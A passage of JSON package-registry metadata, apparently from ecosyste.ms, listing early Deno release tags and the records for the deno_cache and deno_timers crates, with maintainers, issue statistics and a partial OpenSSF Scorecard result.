/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:29.994Z","dependent_packages_count":5,"downloads":457983,"downloads_period":"total","dependent_repos_count":3,"rankings":{"downloads":7.267424469039785,"dependent_repos_count":11.516738357957733,"dependent_packages_count":6.221294675583082,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":5.306516864450109},"purl":"pkg:cargo/deno_cache","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cache","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cache","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cache/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T06:57:37.484Z","updated_at":"2022-11-08T06:57:37.484Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:33.017Z","updated_at":"2023-07-18T22:41:33.017Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047482,"name":"deno_timers","ecosystem":"cargo","description":"Timers API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":35,"first_release_published_at":"2021-04-14T13:33:59.000Z","latest_release_published_at":"2022-02-03T22:47:38.076Z","latest_release_number":"0.34.0","last_synced_at":"2026-08-29T21:57:01.797Z","created_at":"2022-04-12T10:01:07.323Z","updated_at":"2026-08-30T02:55:30.527Z","registry_url":"https://crates.io/crates/deno_timers/","install_command":"cargo install deno_timers","documentation_url":"https://docs.rs/deno_timers/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: 